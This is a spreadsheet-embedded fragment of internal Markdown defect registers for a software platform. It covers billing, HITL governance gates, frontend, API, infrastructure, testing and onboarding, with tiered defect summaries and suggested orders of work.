    documents four credit enforcement points. Two of them, including the pre-run gate,
    have **zero callers**.
  - **[BC-01](#bc-01--the-client-chooses-how-much-to-credit-its-own-wallet)** — the wallet
    is credited with an amount supplied in the request body.
---</t>
  </si>
  <si>
    <t>CTX-156</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Money moves incorrectly](#2-t0--money-moves-incorrectly)
3. [T1 — Metering that under- or double-counts](#3-t1--metering-that-under--or-double-counts)
4. [T2 — Gates and jobs that never run](#4-t2--gates-and-jobs-that-never-run)
5. [T3 — Schema, access and dead weight](#5-t3--schema-access-and-dead-weight)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-157</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--money-moves-incorrectly) | Money moves incorrectly | 6 | **Before the first paying tenant** |
| [T1](#3-t1--metering-that-under--or-double-counts) | Metering that under- or double-counts | 7 | Before any margin analysis |
| [T2](#4-t2--gates-and-jobs-that-never-run) | Gates and jobs that never run | 5 | Before relying on the control |
| [T3](#5-t3--schema-access-and-dead-weight) | Schema, access and dead weight | 7 | Now — mostly cheap |
**Total: 25 defects, 10 improvements.**
The three to read first:
- **[BC-01](#bc-01--the-client-chooses-how-much-to-credit-its-own-wallet)** — verify a $1
  payment, claim $1000, replay it indefinitely.
- **[BC-05](#bc-05--three-of-the-four-credit-gates-have-no-callers)** — a normal agent run
  has no pre-execution credit gate and no in-run circuit breaker.
- **[BC-03](#bc-03--subscribing-strands-the-wallet-and-grants-nothing)** — a complete
  pay-and-get-nothing path.</t>
  </si>
  <si>
    <t>CTX-158</t>
  </si>
  <si>
    <t>## 2. T0 — Money moves incorrectly</t>
  </si>
  <si>
    <t>CTX-159</t>
  </si>
  <si>
    <t>2a. PAYG — consume wallet balance</t>
  </si>
  <si>
    <t># 2a. PAYG — consume wallet balance
if remaining &gt; 0 and wallet.account_model == "pay_as_you_go":
    ...</t>
  </si>
  <si>
    <t>CTX-160</t>
  </si>
  <si>
    <t>2b. Subscription — consume subscription credits then bonus</t>
  </si>
  <si>
    <t># 2b. Subscription — consume subscription credits then bonus
elif remaining &gt; 0 and wallet.account_model == "subscription":
    ...
```
The moment `account_model` flips to `"subscription"`, any remaining `wallet_balance` — real
money the customer paid for — becomes unreachable. It still shows in the balance API and
can never be spent.
- [`billing/credit_service.py:161`](../../../backend/src/billing/credit_service.py:161) and [`:170`](../../../backend/src/billing/credit_service.py:170)
**Fix:** make 2a an independent `if`, or migrate the balance into subscription credits on
switch. The first is one word.
---</t>
  </si>
  <si>
    <t>CTX-161</t>
  </si>
  <si>
    <t>## 3. T1 — Metering that under- or double-counts</t>
  </si>
  <si>
    <t>CTX-162</t>
  </si>
  <si>
    <t>## 4. T2 — Gates and jobs that never run
| ID | Item | Reality | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-163</t>
  </si>
  <si>
    <t>CTX-164</t>
  </si>
  <si>
    <t>## 5. T3 — Schema, access and dead weight</t>
  </si>
  <si>
    <t>CTX-165</t>
  </si>
  <si>
    <t>CTX-166</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | BC-01 (credit `txn.amount`, check `txn.status`) | Two lines. Closes the worst hole in the platform |
| **2** | BC-02 (`elif` → `if`), BC-03 (inject on activation) | Two more small changes; together they fix the pay-and-get-nothing path |
| **3** | BC-I1 / BC-05 | Call the two credit gates that already exist and are already tested |
| **4** | BC-I4 / BC-04 | Schedule the crons; make the daily job a top-up, not a reset |
| **5** | BC-20, BC-19, BC-I6 / BC-21 | Close the two open endpoints and validate pricing inputs |
| **6** | BC-23, BC-24 | The two schema fixes — a migration and a constraint |
| **7** | BC-I3 / BC-07 to BC-11 | One cost write path. The big one, and it fixes five defects at once |
| **8** | BC-I5, BC-I2 | The payment webhook, then credit holds |
---</t>
  </si>
  <si>
    <t>CTX-167</t>
  </si>
  <si>
    <t>## Where to go next
- [14 — Billing, costing &amp; credits](../14-billing-and-credits.md) — the source document.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — BC-01 is D-01, BC-03 is D-02, BC-04 is
  D-03, BC-23 is D-06, BC-24 is D-07, BC-20 is D-08/D-09, BC-19 is D-10, BC-06 is D-37.
- [03 — Data model](03-DATA-MODEL-DEFECTS.md) — DM-01 and DM-04 for the schema half.
- [10 — LLM providers](10-LLM-PROVIDERS-DEFECTS.md) — LP-01 (the 1000× `cost_unit` bug)
  and LP-06 (uncounted thinking tokens) are upstream of everything here.
- [`TOOL-LAYER-DEFECTS.md`](TOOL-LAYER-DEFECTS.md) — TL-19 and TL-20 for tool costing.
- [15 — Governance &amp; HITL](15-GOVERNANCE-AND-HITL-DEFECTS.md) — the service that owns the
  unused credit gates.</t>
  </si>
  <si>
    <t>CTX-168</t>
  </si>
  <si>
    <t>15. Governance, HITL &amp; Feature Flags — Defect Register</t>
  </si>
  <si>
    <t># 15. Governance, HITL &amp; Feature Flags — Defect Register
&gt; **What this document is:** defects in what gates a run and how humans intervene — credit
&gt; gates, HITL checkpoints, rate limiting, tool cost resolution and the feature-flag service
&gt; — plus the improvements that would make a gate mean something.
&gt; **Source document:** [`15-governance-and-hitl.md`](../15-governance-and-hitl.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** this subsystem exists entirely to say **no**. Its defining defect is that
&gt; **almost every gate fails open** — a broken gate is indistinguishable from a passing one.
---</t>
  </si>
  <si>
    <t>CTX-169</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `15-governance-and-hitl.md`, not independently re-checked.
- One principle explains most of this file: every gate here was written to be non-fatal, so
  that a failure in the control could not break a run. The result is a control layer where
  failure and success look identical from the outside.
---</t>
  </si>
  <si>
    <t>CTX-170</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Gates that fail open](#2-t0--gates-that-fail-open)
3. [T1 — HITL correctness](#3-t1--hitl-correctness)
4. [T2 — Feature flags that are not controls](#4-t2--feature-flags-that-are-not-controls)
5. [T3 — Cost resolution and operability](#5-t3--cost-resolution-and-operability)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-171</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--gates-that-fail-open) | Gates that fail open | 5 | **Now** — a gate that fails open is not a gate |
| [T1](#3-t1--hitl-correctness) | HITL correctness | 6 | Before HITL is sold as a safety feature |
| [T2](#4-t2--feature-flags-that-are-not-controls) | Feature flags that are not controls | 5 | Before an operator trusts the flags page |
| [T3](#5-t3--cost-resolution-and-operability) | Cost resolution and operability | 5 | When the area is next touched |
**Total: 21 defects, 10 improvements.**
The three to read first:
- **[GH-01](#gh-01--if-redis-is-down-every-hitl-checkpoint-is-skipped)** — the step runs
  unapproved and the approval row stays `PENDING` forever.
- **[GH-02](#gh-02--two-of-the-four-credit-gates-are-never-called)** — a normal run has no
  pre-execution credit gate and no in-run circuit breaker.
- **[GH-06](#gh-06--reject-and-timeout-are-detected-by-matching-exception-text)** — the gate
  re-raises based on a substring of an error message.</t>
  </si>
  <si>
    <t>CTX-172</t>
  </si>
  <si>
    <t>## 2. T0 — Gates that fail open</t>
  </si>
  <si>
    <t>CTX-173</t>
  </si>
  <si>
    <t>## 3. T1 — HITL correctness</t>
  </si>
  <si>
    <t>CTX-174</t>
  </si>
  <si>
    <t>## 4. T2 — Feature flags that are not controls
| ID | Problem | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-175</t>
  </si>
  <si>
    <t>&gt; The cross-cutting lesson, worth stating once: **adding a flag is not the same as wiring a
&gt; control.** Eight flags on the admin page do nothing at all, and an operator has no way to
&gt; tell which.
---</t>
  </si>
  <si>
    <t>CTX-176</t>
  </si>
  <si>
    <t>## 5. T3 — Cost resolution and operability</t>
  </si>
  <si>
    <t>CTX-177</t>
  </si>
  <si>
    <t>CTX-178</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | GH-I2 | Metrics on gate failure. Nothing else here is verifiable without it |
| **2** | GH-01, GH-I4 / GH-06 | Make HITL fail closed and use typed exceptions. Two changes, one file |
| **3** | GH-I5 / GH-02 | Call the two credit gates that already exist |
| **4** | GH-12, GH-I8 / GH-16 | Delete the duplicate key and the flags that do nothing |
| **5** | GH-I3 / GH-07 | Pause instead of blocking. The biggest throughput win |
| **6** | GH-09, GH-10, GH-11 | Make HITL configuration honest: log skips, validate expressions, show the snapshot |
| **7** | GH-I10 / GH-03, GH-I6 / GH-18 | Per-tenant quotas and a company-level budget |
| **8** | GH-I1 | The written fail-open/fail-closed policy, once the individual cases are understood |
---</t>
  </si>
  <si>
    <t>CTX-179</t>
  </si>
  <si>
    <t>## Where to go next
- [15 — Governance, HITL &amp; feature flags](../15-governance-and-hitl.md) — the source
  document, including the full flag catalogue.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — GH-12 is D-29.
- [14 — Billing &amp; credits](14-BILLING-AND-CREDITS-DEFECTS.md) — BC-05 is the billing view
  of GH-02.
- [05 — Agent kernel](05-AGENT-KERNEL-DEFECTS.md) — where the gates should be called from.
- [13 — Gateway &amp; real-time](13-GATEWAY-AND-REALTIME-DEFECTS.md) — GW-01 and GW-02 are the
  edge instances of GH-21.
- [`TOOL-LAYER-DEFECTS.md`](TOOL-LAYER-DEFECTS.md) — TL-19 and TL-28 for GH-03 and GH-17.</t>
  </si>
  <si>
    <t>CTX-180</t>
  </si>
  <si>
    <t>16. Frontend Architecture — Defect Register</t>
  </si>
  <si>
    <t># 16. Frontend Architecture — Defect Register
&gt; **What this document is:** defects in the React SPA — routing, state, fetching,
&gt; rendering cost and the build — plus the improvements that would make the app faster and
&gt; cheaper to work on.
&gt; **Source document:** [`16-frontend.md`](../16-frontend.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** the app ships with **no error boundary, no test runner and no working
&gt; lint**. Those three absences shape everything below.
---</t>
  </si>
  <si>
    <t>CTX-181</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code or config was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `16-frontend.md`, not independently re-checked.
- Performance items here are unusually concrete: the document measured them. Where a
  number is quoted, it comes from reading the component, not from a benchmark.
---</t>
  </si>
  <si>
    <t>CTX-182</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — The app can blank out and nobody would know](#2-t0--the-app-can-blank-out-and-nobody-would-know)
3. [T1 — Broken behaviour](#3-t1--broken-behaviour)
4. [T2 — Dead code and unused dependencies](#4-t2--dead-code-and-unused-dependencies)
5. [T3 — Performance](#5-t3--performance)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-183</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--the-app-can-blank-out-and-nobody-would-know) | The app can blank out and nobody would know | 4 | **Now** — all four are small |
| [T1](#3-t1--broken-behaviour) | Broken behaviour | 7 | Before the next release |
| [T2](#4-t2--dead-code-and-unused-dependencies) | Dead code and unused dependencies | 5 | Free |
| [T3](#5-t3--performance) | Performance | 7 | When the page in question is next touched |
**Total: 23 defects, 10 improvements.**
The three to read first:
- **[FE-01](#fe-01--there-is-no-error-boundary)** — one render throw blanks the entire
  application, with no message.
- **[FE-04](#fe-04--if-you-forget-env-development-talks-to-production)** — the API client's
  fallback base URL is the production gateway.
- **[FE-17](#fe-17--the-webgl-background-never-sleeps)** — 6,300 matrix writes per frame
  plus a bloom pass, in the entry chunk, never cancelled.
---</t>
  </si>
  <si>
    <t>CTX-184</t>
  </si>
  <si>
    <t>## 2. T0 — The app can blank out and nobody would know</t>
  </si>
  <si>
    <t>CTX-185</t>
  </si>
  <si>
    <t>## 3. T1 — Broken behaviour</t>
  </si>
  <si>
    <t>CTX-186</t>
  </si>
  <si>
    <t>## 4. T2 — Dead code and unused dependencies
| ID | Delete | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-187</t>
  </si>
  <si>
    <t>&gt; Before deleting a component, confirm nothing imports it:
&gt; `grep -rn "&lt;ComponentName" frontend/src --include=*.tsx`
---</t>
  </si>
  <si>
    <t>CTX-188</t>
  </si>
  <si>
    <t>## 5. T3 — Performance</t>
  </si>
  <si>
    <t>CTX-189</t>
  </si>
  <si>
    <t>CTX-190</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | FE-I1 — error boundary, ESLint config, vitest | One afternoon. Everything after this is safer, and two defects below get caught automatically |
| **2** | FE-I2 / FE-19, FE-04 | Stop the infinite poll; stop dev talking to production |
| **3** | T2 deletions — FE-12 to FE-16 | Free. Four unused dependencies and 314 lines of dead page |
| **4** | FE-05, FE-06, FE-10, FE-11 | Four small, visible bugs |
| **5** | FE-I4 / FE-17 | The background: lazy-load, cancel, pause. Biggest first-paint win |
| **6** | FE-I3 — react-query | Replaces four fetch problems with one library |
| **7** | FE-I5 / FE-18, FE-20 | Memoise the two heavy components |
| **8** | FE-I10 — production build, FE-I8 — one route list | The two structural changes |
---</t>
  </si>
  <si>
    <t>CTX-191</t>
  </si>
  <si>
    <t>## Where to go next
- [16 — Frontend architecture](../16-frontend.md) — the source document.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — FE-01 is D-38, FE-02 is D-39, FE-03 is
  D-40, FE-12 is part of D-30.
- [17 — API reference](17-API-REFERENCE-DEFECTS.md) — the endpoints these pages call.
- [19 — Testing](19-TESTING-DEFECTS.md) — the backend picture, and why FE-02/FE-03 have no
  CI to run in.
- [01 — Product overview](01-PRODUCT-OVERVIEW-DEFECTS.md) — PO-01, PO-02 and PO-05 are
  frontend-visible product defects.</t>
  </si>
  <si>
    <t>CTX-192</t>
  </si>
  <si>
    <t>17. API Reference — Defect Register</t>
  </si>
  <si>
    <t># 17. API Reference — Defect Register
&gt; **What this document is:** defects in the HTTP surface itself — routes that do not exist,
&gt; routes that should not be reachable, inconsistent paths and missing pagination — plus the
&gt; improvements that would make the API predictable.
&gt; **Source document:** [`17-api-reference.md`](../17-api-reference.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** the API is assembled from about twenty routers mounted with chained
&gt; prefixes, half of them inside `try/except ImportError`. There is no route census, so
&gt; nothing checks that the documented surface and the real one agree.
---</t>
  </si>
  <si>
    <t>CTX-193</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `17-api-reference.md`, not independently re-checked.
- Route-level authorisation defects live in
  [04 — Auth, RBAC &amp; tenancy](04-AUTH-RBAC-TENANCY-DEFECTS.md); this file covers the shape
  of the surface. The two overlap on [API-01](#api-01--four-endpoints-are-open-or-wrongly-gated),
  which is repeated here because an API reference is where someone checks.
---</t>
  </si>
  <si>
    <t>CTX-194</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Reachable and should not be](#2-t0--reachable-and-should-not-be)
3. [T1 — Documented and not reachable](#3-t1--documented-and-not-reachable)
4. [T2 — Delete](#4-t2--delete)
5. [T3 — Inconsistency across the surface](#5-t3--inconsistency-across-the-surface)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-195</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--reachable-and-should-not-be) | Reachable and should not be | 4 | **Now** |
| [T1](#3-t1--documented-and-not-reachable) | Documented and not reachable | 5 | Before anyone integrates |
| [T2](#4-t2--delete) | Delete | 4 | Free — two are past their own removal date |
| [T3](#5-t3--inconsistency-across-the-surface) | Inconsistency across the surface | 7 | Opportunistically |
**Total: 20 defects, 10 improvements.**
The three to read first:
- **[API-01](#api-01--four-endpoints-are-open-or-wrongly-gated)** — five routes that
  create, read or delete credentials and cost data without adequate auth.
- **[API-02](#api-02--the-cron-endpoints-move-money-over-http)** — two HTTP endpoints that
  grant credits, triggerable by hand.
- **[API-05](#api-05--the-frontend-calls-a-delete-route-that-does-not-exist)** — the UI
  calls an endpoint nobody wrote.</t>
  </si>
  <si>
    <t>CTX-196</t>
  </si>
  <si>
    <t>## 2. T0 — Reachable and should not be</t>
  </si>
  <si>
    <t>CTX-197</t>
  </si>
  <si>
    <t>## 3. T1 — Documented and not reachable</t>
  </si>
  <si>
    <t>CTX-198</t>
  </si>
  <si>
    <t>CTX-199</t>
  </si>
  <si>
    <t>CTX-200</t>
  </si>
  <si>
    <t>## 5. T3 — Inconsistency across the surface</t>
  </si>
  <si>
    <t>CTX-201</t>
  </si>
  <si>
    <t>CTX-202</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | API-01 | Five routes with missing or wrong guards. See register 04 for the fixes |
| **2** | API-03, API-04 | The two unauthenticated execution-creating endpoints |
| **3** | T2 deletions — API-10 to API-13 | Free, and API-10 is past its own removal date |
| **4** | API-05, API-06 | Implement the two routes the frontend already calls |
| **5** | API-07 — **W-1** | Move the transcript router onto the gateway; decide the `/v1` question then |
| **6** | API-I1, API-I2 | The route census and the mount-failure list |
| **7** | API-I5, API-I4 | Auth by default; generate the client from the schema |
| **8** | API-I3, API-I6, API-I7 | Pagination, error envelopes, versioning — the consistency pass |
---</t>
  </si>
  <si>
    <t>CTX-203</t>
  </si>
  <si>
    <t>## Where to go next
- [17 — API reference](../17-api-reference.md) — the source document, with the full route
  table.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — API-01 is D-04/D-08/D-09, API-07 is D-15
  and **W-1**, API-10 is D-24, API-12 is D-22, API-14 is D-41.
- [04 — Auth, RBAC &amp; tenancy](04-AUTH-RBAC-TENANCY-DEFECTS.md) — the fixes for API-01.
- [13 — Gateway &amp; real-time](13-GATEWAY-AND-REALTIME-DEFECTS.md) — the port-8001 surface.
- [16 — Frontend](16-FRONTEND-DEFECTS.md) — the client side of API-05 and API-I4.</t>
  </si>
  <si>
    <t>CTX-204</t>
  </si>
  <si>
    <t>18. Infrastructure, Deployment &amp; Operations — Defect Register</t>
  </si>
  <si>
    <t># 18. Infrastructure, Deployment &amp; Operations — Defect Register
&gt; **What this document is:** defects in how the platform is built, deployed, backed up and
&gt; operated — the boot scripts, Apache, Docker, backups, CI and the runbooks — plus the
&gt; improvements that would make it survivable at 3am.
&gt; **Source document:** [`18-infrastructure-and-deployment.md`](../18-infrastructure-and-deployment.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** everything runs on **one VM** with **monthly backups stored on the same
&gt; disk**. Those two facts together are the most serious thing in this register.
---</t>
  </si>
  <si>
    <t>CTX-205</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the file or config was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `18-infrastructure-and-deployment.md`, not independently
  re-checked.
- Severity here means **what happens when something goes wrong**, not how likely it is.
  A monthly backup is fine until the day it is not.
---</t>
  </si>
  <si>
    <t>CTX-206</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Data loss and recovery](#2-t0--data-loss-and-recovery)
3. [T1 — Not production-ready as configured](#3-t1--not-production-ready-as-configured)
4. [T2 — Traps in the scripts and configs](#4-t2--traps-in-the-scripts-and-configs)
5. [T3 — Operability](#5-t3--operability)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-207</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--data-loss-and-recovery) | Data loss and recovery | 4 | **Now** |
| [T1](#3-t1--not-production-ready-as-configured) | Not production-ready as configured | 6 | Before the next deployment |
| [T2](#4-t2--traps-in-the-scripts-and-configs) | Traps in the scripts and configs | 6 | Now — all cheap |
| [T3](#5-t3--operability) | Operability | 5 | Before the first on-call rotation |
**Total: 21 defects, 10 improvements.**
The three to read first:
- **[IN-01](#in-01--backups-are-monthly-and-on-the-same-disk-as-the-database)** — up to 31
  days of data loss, and a disk failure loses the backups too.
- **[IN-02](#in-02--the-backup-script-writes-to-a-path-that-does-not-exist-here)** — the
  defaults point at an older checkout, so backups may not be running at all.
- **[IN-05](#in-05--the-repository-has-no-functioning-ci)** — the one workflow filters on a
  directory that no longer exists. It has never fired.</t>
  </si>
  <si>
    <t>CTX-208</t>
  </si>
  <si>
    <t>## 2. T0 — Data loss and recovery</t>
  </si>
  <si>
    <t>CTX-209</t>
  </si>
  <si>
    <t>## 3. T1 — Not production-ready as configured</t>
  </si>
  <si>
    <t>CTX-210</t>
  </si>
  <si>
    <t>## 4. T2 — Traps in the scripts and configs
| ID | Trap | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-211</t>
  </si>
  <si>
    <t>CTX-212</t>
  </si>
  <si>
    <t>## 5. T3 — Operability</t>
  </si>
  <si>
    <t>CTX-213</t>
  </si>
  <si>
    <t>CTX-214</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | IN-02, then IN-I2 | Check whether a usable backup exists at all, then fix the paths and the schedule |
| **2** | IN-I1 / IN-05 | CI. Nothing else can be enforced without it |
| **3** | IN-I3 / IN-09, IN-07 | Log rotation and the `/uploads` block. Both are minutes |
| **4** | IN-I5 / IN-08, IN-I8 / IN-11 | Firewall config; make the stop script precise |
| **5** | IN-I6 / IN-20 | Instrument the worker and the gateway |
| **6** | IN-I10 | The four census checks, now that CI can run them |
| **7** | IN-I7 / IN-21, IN-I4 / IN-06 | Production build and a hardened image |
| **8** | IN-17, IN-I9 / IN-10 | The `core/` refactor and one Python version |
---</t>
  </si>
  <si>
    <t>CTX-215</t>
  </si>
  <si>
    <t>## Where to go next
- [18 — Infrastructure, deployment &amp; operations](../18-infrastructure-and-deployment.md) —
  the source document, including the runbooks.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — IN-05 is D-14, IN-12 is D-45, and §9
  Guardrails is IN-I10.
- [02 — System architecture](02-SYSTEM-ARCHITECTURE-DEFECTS.md) — SA-01, SA-02, SA-14 for
  the vhosts and the port-8002 removal.
- [19 — Testing](19-TESTING-DEFECTS.md) — what CI would actually run.
- [16 — Frontend](16-FRONTEND-DEFECTS.md) — FE-I10 for the production build.</t>
  </si>
  <si>
    <t>CTX-216</t>
  </si>
  <si>
    <t>19. Testing &amp; Quality Gates — Defect Register</t>
  </si>
  <si>
    <t># 19. Testing &amp; Quality Gates — Defect Register
&gt; **What this document is:** defects in the test suite and the gates around it — what runs,
&gt; what silently does not, and what a green result actually proves — plus the improvements
&gt; that would make the suite trustworthy.
&gt; **Source document:** [`19-testing.md`](../19-testing.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** there are **1,063 backend tests and no CI that runs them**. The suite is
&gt; good. Nothing enforces it.
---</t>
  </si>
  <si>
    <t>CTX-217</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the file or config was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `19-testing.md`, not independently re-checked.
- The central problem is not test quality. The backend suite is substantial and
  well-organised. The problem is that **a green run does not mean what it appears to
  mean**: three whole tiers skip rather than fail when their infrastructure is absent, and
  nothing runs any of it automatically.
---</t>
  </si>
  <si>
    <t>CTX-218</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — Nothing enforces any of it](#2-t0--nothing-enforces-any-of-it)
3. [T1 — A green run can be an empty run](#3-t1--a-green-run-can-be-an-empty-run)
4. [T2 — Dead scaffolding](#4-t2--dead-scaffolding)
5. [T3 — Traps and drift](#5-t3--traps-and-drift)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-219</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--nothing-enforces-any-of-it) | Nothing enforces any of it | 4 | **Now** — everything else depends on this |
| [T1](#3-t1--a-green-run-can-be-an-empty-run) | A green run can be an empty run | 4 | Before trusting a test result |
| [T2](#4-t2--dead-scaffolding) | Dead scaffolding | 5 | Free |
| [T3](#5-t3--traps-and-drift) | Traps and drift | 6 | When the suite is next touched |
**Total: 19 defects, 10 improvements.**
The three to read first:
- **[TS-01](#ts-01--the-only-ci-workflow-has-never-fired)** — the `paths` filter points at
  a directory that no longer exists.
- **[TS-05](#ts-05--three-test-tiers-skip-instead-of-failing)** — `integration`, `e2e` and
  `parity` all call `pytest.skip()` when Postgres is unreachable.
- **[TS-08](#ts-08--the-frontend-tests-cannot-run-at-all)** — two test files importing a
  package that is not installed.</t>
  </si>
  <si>
    <t>CTX-220</t>
  </si>
  <si>
    <t>## 2. T0 — Nothing enforces any of it</t>
  </si>
  <si>
    <t>CTX-221</t>
  </si>
  <si>
    <t>## 3. T1 — A green run can be an empty run</t>
  </si>
  <si>
    <t>CTX-222</t>
  </si>
  <si>
    <t>## 4. T2 — Dead scaffolding
| ID | Delete | Notes | Status |
|---|---|---|---|</t>
  </si>
  <si>
    <t>CTX-223</t>
  </si>
  <si>
    <t>CTX-224</t>
  </si>
  <si>
    <t>## 5. T3 — Traps and drift</t>
  </si>
  <si>
    <t>CTX-225</t>
  </si>
  <si>
    <t>CTX-226</t>
  </si>
  <si>
    <t>## 7. Suggested order of work
| Step | Work | Why here |
|---|---|---|
| **1** | TS-I1 / TS-01, TS-02 | Turn on CI. Everything else in this file is unenforceable without it |
| **2** | TS-I2 / TS-05, TS-I3 / TS-06 | Make silent skips and stub responses fail. A green run must mean something first |
| **3** | T2 deletions — TS-09 to TS-13 | Free. Empty scaffolding, unused markers, a duplicate mock |
| **4** | TS-I5 / TS-14, TS-15 | Register `integration`, enable strict markers |
| **5** | TS-I9 / TS-04, TS-08 | Frontend lint and test runner |
| **6** | TS-I7 | The "declared but never called" check — the highest-value new test for this codebase |
| **7** | TS-I6, TS-I8 | The four censuses and the flag census |
| **8** | TS-I4 / TS-07, TS-16 | Teardown for the two polluting tiers |
---</t>
  </si>
  <si>
    <t>CTX-227</t>
  </si>
  <si>
    <t>## Where to go next
- [19 — Testing &amp; quality gates](../19-testing.md) — the source document, including the
  fixture chain and the command cheat-sheet.
- [`DEFECT-REGISTER.md`](../DEFECT-REGISTER.md) — TS-01 is D-14, TS-04 is D-39/D-40, and §9
  Guardrails is TS-I6.
- [18 — Infrastructure &amp; deployment](18-INFRASTRUCTURE-AND-DEPLOYMENT-DEFECTS.md) — IN-05
  and IN-18 are the operations view of TS-01 and TS-03.
- [16 — Frontend](16-FRONTEND-DEFECTS.md) — FE-02 and FE-03 for the frontend half.</t>
  </si>
  <si>
    <t>CTX-228</t>
  </si>
  <si>
    <t>20. Developer Onboarding &amp; Glossary — Defect Register</t>
  </si>
  <si>
    <t># 20. Developer Onboarding &amp; Glossary — Defect Register
&gt; **What this document is:** defects in the onboarding experience itself — the day-one
&gt; setup, the first-change exercise, the mental model a newcomer is given, and the glossary
&gt; — plus the improvements that would shorten time-to-first-commit.
&gt; **Source document:** [`20-onboarding-and-glossary.md`](../20-onboarding-and-glossary.md)
&gt; **Compiled:** 2026-09-01, against branch `fresh-main`.
&gt; **Context:** this is the only document in the set whose defects are measured in **a new
&gt; developer's wasted hours**. Several of them teach an incorrect mental model, which is
&gt; more expensive than a broken command.
---</t>
  </si>
  <si>
    <t>CTX-229</t>
  </si>
  <si>
    <t>## How to read this file
- **✅ Verified** — the code, config or doc was read on 2026-09-01 and the claim held.
- **📄 Doc-reported** — from `20-onboarding-and-glossary.md`, not independently re-checked.
- Two kinds of defect live here:
  1. **Setup defects** — the documented path does not produce a working system.
  2. **Model defects** — the document teaches something that is not true of the code.
     These are worse, because the developer carries them into every subsequent ticket.
---</t>
  </si>
  <si>
    <t>CTX-230</t>
  </si>
  <si>
    <t>## Contents
1. [Summary](#1-summary)
2. [T0 — The documented setup does not work](#2-t0--the-documented-setup-does-not-work)
3. [T1 — The onboarding teaches the wrong model](#3-t1--the-onboarding-teaches-the-wrong-model)
4. [T2 — Stale references](#4-t2--stale-references)
5. [T3 — Glossary and navigation](#5-t3--glossary-and-navigation)
6. [Improvements](#6-improvements)
7. [Suggested order of work](#7-suggested-order-of-work)
---</t>
  </si>
  <si>
    <t>CTX-231</t>
  </si>
  <si>
    <t>## 1. Summary
| Tier | Theme | Count | When to do it |
|---|---|---|---|
| [T0](#2-t0--the-documented-setup-does-not-work) | The documented setup does not work | 4 | **Now** — every new hire hits these |
| [T1](#3-t1--the-onboarding-teaches-the-wrong-model) | The onboarding teaches the wrong model | 5 | Now — cheapest to fix, most expensive to leave |
| [T2](#4-t2--stale-references) | Stale references | 5 | Free |
| [T3](#5-t3--glossary-and-navigation) | Glossary and navigation | 4 | Opportunistically |
**Total: 18 defects, 10 improvements.**
The three to read first:
- **[ON-01](#on-01--the-setup-sequence-omits-two-required-steps)** — follow the documented
  steps exactly and the phone inventory and sandbox SKU are missing.
- **[ON-05](#on-05--section-33-describes-a-memory-block-that-is-never-injected)** — the
